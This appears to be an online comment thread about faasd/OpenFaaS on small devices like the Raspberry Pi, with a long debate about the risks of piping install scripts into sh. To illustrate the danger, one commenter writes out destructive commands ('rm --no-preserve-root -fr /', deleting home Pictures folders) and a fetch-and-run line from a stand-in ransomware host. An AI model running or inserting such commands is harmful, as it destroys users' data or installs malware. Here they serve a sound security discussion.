Read the introduction and conclusion for use cases. Self-hosted FaaS gives a "serverless" hands-off experience, whilst making it trivial to package and operate Flask, Go, Node/Express, C#, and so on. Try it, see what you think.
You don't have to keep it running in memory all the time.
If you have a small device with limited resources, maybe you'd rather have it ready to do many different things for you infrequently, as opposed to doing a few things continuously all the time.
It was my understanding that the kernel would put idle processes to sleep, and even move the memory they use from RAM to disk, waking them up if there is some input for them.
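For what it's worth, you can see how much of a process has been swapped out; a quick check on Linux (1234 is a placeholder PID, and this assumes swap is enabled):

    # VmSwap reports how much of this process's memory currently lives in swap
    grep VmSwap /proc/1234/status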
Ok, that's a fair point. So maybe some serverless tech can be more specialised and thus better than the Linux kernel at managing, effectively, virtual memory.
If everything is written in-house I still think a plain API would be simpler, but I guess this way some functions can be supplied by vendors or open source, which currently can't be composed into, say, a Flask API. So it would be nice to have a way of composing APIs from simple functions shipped in packages. I guess that is what serverless is.
In case you aren't aware, there are plenty of tutorials out there that help you get a Raspberry Pi to boot from USB, which allows you to use any hard drive you like.
Moreover, nothing stops you from getting everything to run on a RAM drive (sketch at the end of this comment). There are Raspberry Pis with 8 GB of RAM on the market right now.
Having said that, an official Raspberry Pi SD card with 16 GB sells for $10. Not exactly something that pushes you to bankruptcy.
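For the RAM-drive route, a minimal sketch (mount point and size are arbitrary choices here):

    # tmpfs lives entirely in RAM; contents disappear on reboot
    sudo mkdir -p /mnt/ramdisk
    sudo mount -t tmpfs -o size=2g tmpfs /mnt/ramdisk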
> it will be faulty way sooner because lots of I/O
It all makes sense now. One of my first computing projects was making a small cluster computer with Raspberry Pi boards. I noticed that the SD cards started to fail oddly fast. Most likely because they were all either Swarm nodes or the Swarm controller.
The difference might be (besides card quality) the amount of free space on the card. If you are churning through the same 500 MB with your temporary files, you will wear the card out much faster than if you spread the same I/O over 5 GB of empty space; with roughly ten times as many blocks to rotate through, wear leveling gives each block about a tenth of the erase cycles.
I had a Pi which was very unstable. I measured the USB cable (supposedly a charging cable) and it had 1 ohm of resistance! I replaced it with a proper one and it's been rock solid since.
Can you explain why this is so unacceptable? Couldn't you inspect the contents at the URL before you executed the command? What I've seen in some cases is running the curl command to download the file and then executing it. I don't see much difference. This is a serious question, not arguing that this is the best way.
The difference is between inspecting the executed command, and blindly executing something where you have no idea what it's going to do.
For example, maybe the URL's contents are "rm --no-preserve-root -fr /". Or "rm -fr /home/*/Pictures 2>/dev/null". Or "curl https://ransomware-encryptor.example.com | sh".
No problem if you inspect it first. Lots of unhappiness and heartbreak if you don't.
Has anyone, in the history of complaining about this type of script, ever run one and had it nuke their computer? What are the odds that the domains, companies, and projects using this have built their entire online presence just to pwn your computer for the lulz? Or that they were compromised by an undetected malicious actor at exactly the moment you ran the installer, and nobody anywhere said anything?
How about if instead we exercise critical thinking and make our own assessment of the risk and act accordingly? Why would you choose not to pipe a shell script from a site you don’t trust but execute their installer instead?
If you don’t want to pipe it, download it and read it first.
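Concretely, the non-piped version is just this (the URL is a placeholder):

    # Save it, read it, and only then run the exact bytes you read
    curl -fsSL https://get.example.com/install.sh -o install.sh
    less install.sh
    sh install.sh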
But I don't pretend there's no security risk in doing so. Like you advised, I exercise critical thinking, and then I take a risk.
On someone else's production machine, or a container with sensitive data, that risk is too high. On a fun machine in isolation it's fine.
The GPP asks what's the security difference between inspecting and not inspecting the downloaded command.
> or that they have been compromised by a malicious actor without being detected at the same time you run the installer
Installers are compromised quite often by malicious actors. Running an installer is just as dubious as running "curl | sh".
However, replacing an installer with one that looks the same but is actually malicious is a lot more work than replacing a blind script with one that looks the same but is actually malicious.
And a malicious blind script is more likely to go unnoticed than a compromised installer whose SHA256 is published next to the download link, simply because the attacker would need to change two places instead of one. Yes, I do check installer hashes when that's possible and there isn't a package manager already doing so. It's a good idea anyway to catch corrupted downloads, which I do see from time to time.
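For anyone unfamiliar, the check is a one-liner (installer.run and the hash are placeholders for whatever the vendor publishes):

    # Compare the download against the published checksum
    sha256sum installer.run
    # or automate the comparison (note the two spaces in the expected format)
    echo "<published-sha256>  installer.run" | sha256sum --check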
Pretty close. Some of them install all sorts of wacky dependencies through non-traditional means. Like you curl an install script and then it goes and curls a whole bunch of other stuff.
Massive PITA to track all the changes that it made and uninstall it.
Package managers were made for a reason, and people should use them.
Since the shell script in question installs OpenFaaS, unless you read all the source code for OpenFaaS too, you still really have no idea whether it's going to do something malicious or not.
A reasonable attacker would serve a different file to curl than to the browser, so you inspect one thing, run another, and don't even keep a copy of the file you ran.
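One cheap way to catch at least the User-Agent variant of that trick (URL is a placeholder): fetch the same URL twice and diff the results.

    # Download once as curl's default identity, once pretending to be a browser
    curl -fsSL https://get.example.com/install.sh -o as-curl.sh
    curl -fsSL -A "Mozilla/5.0 (X11; Linux x86_64)" \
         https://get.example.com/install.sh -o as-browser.sh
    diff as-curl.sh as-browser.sh   # any difference is a red flag

Though an attacker has other ways to vary what they serve, so saving one copy and running exactly that copy is the more robust habit.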
Yes, a .deb package. Much easier to UNinstall. That's the biggest problem with these install scripts: they crap all over your entire system and it's not obvious how to get rid of it if you decide you don't want it.
Actually, deb is a way to "distribute" software, not to "just" install something. Let's say I want to install Docker; on Ubuntu I need to type the following commands:
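Roughly, per Docker's own docs (the exact package list and repo line vary a bit by release):

    # Prerequisites plus Docker's signing key
    sudo apt-get update
    sudo apt-get install apt-transport-https ca-certificates curl gnupg-agent software-properties-common
    curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
    # Add the third-party repository, then install from it
    sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
    sudo apt-get update
    sudo apt-get install docker-ce docker-ce-cli containerd.io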
How would `.deb` help you to install/uninstall such software? Do you mean embedding some scripts to add a third-party repository and then installing your app?
Even then, what does it actually change from the script I already suggested in my previous post? It still comes down to downloading two files (the signature and the packaged application) and installing it (e.g. via dpkg --install).
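That is, something like this (URLs are placeholders, and the vendor's signing key is assumed to be imported already):

    # Fetch the package and its detached signature, verify, then install
    curl -fsSLO https://example.com/app_1.0_amd64.deb
    curl -fsSLO https://example.com/app_1.0_amd64.deb.asc
    gpg --verify app_1.0_amd64.deb.asc app_1.0_amd64.deb
    sudo dpkg --install app_1.0_amd64.deb
    # and the part install scripts rarely give you: a clean undo
    sudo dpkg --remove app    # or --purge to drop config files too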
PPAs are just Ubuntu's way to make creating APT repositories easier. Those steps above are the longer way of achieving the same result without relying on Canonical's infrastructure. The same instructions can also be used, with minor changes, on Debian and Raspbian (and would probably work on most other Debian-based distros).
Those steps above are covering all the bases for Debian-based distros: adding the signing keys Docker uses for their packages, and then finally installing the packages themselves.
Erm, no. I don't think I was clear in my first post. I am not asking "how to install an apt package", but how to provide a universal recipe for shipping third-party software as a handy installation script. What you suggest is how to download and install a few debs from a website. When I write such a script, I don't trust the host name "just like that" as you suggest. It can be malformed, or point to a totally different host than we would expect.
Of course they were, but they are meant for more sophisticated purposes (install, update, reinstall, remove, or even purge a program along with its user data, etc.), and all of that logic is usually backed by signature checking and other security mechanisms. I agree, apt/dnf/pacman/apk/xbps are great, but...
In the case of Ubuntu, in order to install some deb-based software you usually have to bring your own script (this is what I call a "copy & paste installation script") to add the third-party repository that contains the given package.
Yes... working on that one. They don't have e2e testing equipment and don't have a personal interest in it, so they default to not doing anything about it. In the meantime armhf and arm64 are available here, along with custom build instructions: https://github.com/alexellis/containerd-arm
This should be flagged as 2019 in the title. OpenFaaS has progressed further (IIRC there are Docker Compose files for single-node deployments out there).
For those who are commenting without reading the post (I know who you are :)):
> The use-cases for Serverless / FaaS are fairly well-known, but you could use faasd at the edge, in a smart-car, as part of an IoT device, for crunching data before uploading samples to the cloud, for webhook receivers/alerting, bots, webservices, API integrations or even providing your own APIs. Compute is compute, and OpenFaaS with containerd makes it easy to both consume and provide.
See also potential use-cases
Bear in mind that faasd is also used in production where users don't want to maintain a Kubernetes cluster, but do want a few APIs, websites, or functions.
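For the curious, the day-to-day workflow is the standard OpenFaaS CLI; a minimal sketch (assumes faasd and faas-cli are already installed, and that the function image is pushed somewhere containerd can pull from):

    # Scaffold, build/push/deploy, and invoke a function
    faas-cli new hello --lang python3
    faas-cli up -f hello.yml
    curl http://127.0.0.1:8080/function/hello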